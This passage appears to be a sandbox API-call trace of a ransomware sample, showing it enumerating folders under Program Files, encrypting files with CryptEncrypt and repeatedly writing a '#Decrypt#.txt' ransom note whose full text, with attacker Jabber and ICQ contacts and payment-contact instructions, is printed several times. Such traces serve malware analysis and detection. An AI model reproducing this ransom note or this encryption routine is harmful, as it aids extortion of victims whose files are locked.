\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.300] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.301] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.301] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.301] CloseHandle (hObject=0x158) returned 1 [0234.301] 
GetProcessHeap () returned 0x780000 [0234.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.301] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0234.301] lstrcmpiW (lpString1="zh-CN", lpString2="Windows") returned 1 [0234.301] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN") returned 60 [0234.302] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0234.302] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0234.302] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.302] GetProcessHeap () returned 0x780000 [0234.302] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.302] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*") returned 62 [0234.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\.") returned 62 [0234.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.303] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\..") returned 63 [0234.303] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.304] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.304] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.304] wnsprintfW (in: pszDest=0x7db828, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui") returned 76 [0234.304] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.304] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.304] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.304] lstrlenW (lpString=".testttjffg") returned 11 [0234.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.305] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.305] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.305] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\#Decrypt#.txt") returned 74 [0234.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.316] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.317] lstrlenA (lpString="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") returned 1368 [0234.318] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.318] CloseHandle (hObject=0x158) returned 1 [0234.318] GetProcessHeap () returned 0x780000 [0234.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0234.318] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0234.318] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW") returned 60 [0234.318] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0234.318] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0234.318] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.318] GetProcessHeap () returned 0x780000 [0234.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.318] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*") returned 62 [0234.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.319] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.319] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\.") returned 62 [0234.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.319] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.319] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\zh-TW\\..") returned 63 [0234.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.320] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui") returned 76 [0234.320] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.320] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.320] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.320] lstrlenW (lpString=".testttjffg") returned 11 [0234.320] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.320] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.320] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.320] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.321] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\#Decrypt#.txt") returned 74 [0234.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.321] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.321] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.322] lstrlenA (lpString="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") returned 1368 [0234.323] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.323] CloseHandle (hObject=0x158) returned 1 [0234.323] GetProcessHeap () returned 0x780000 [0234.323] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.323] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0234.323] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.323] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\#Decrypt#.txt") returned 68 [0234.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.324] lstrlenA (lpString="All 
your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.324] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.325] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.325] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.325] CloseHandle (hObject=0x21c) returned 1 [0234.326] 
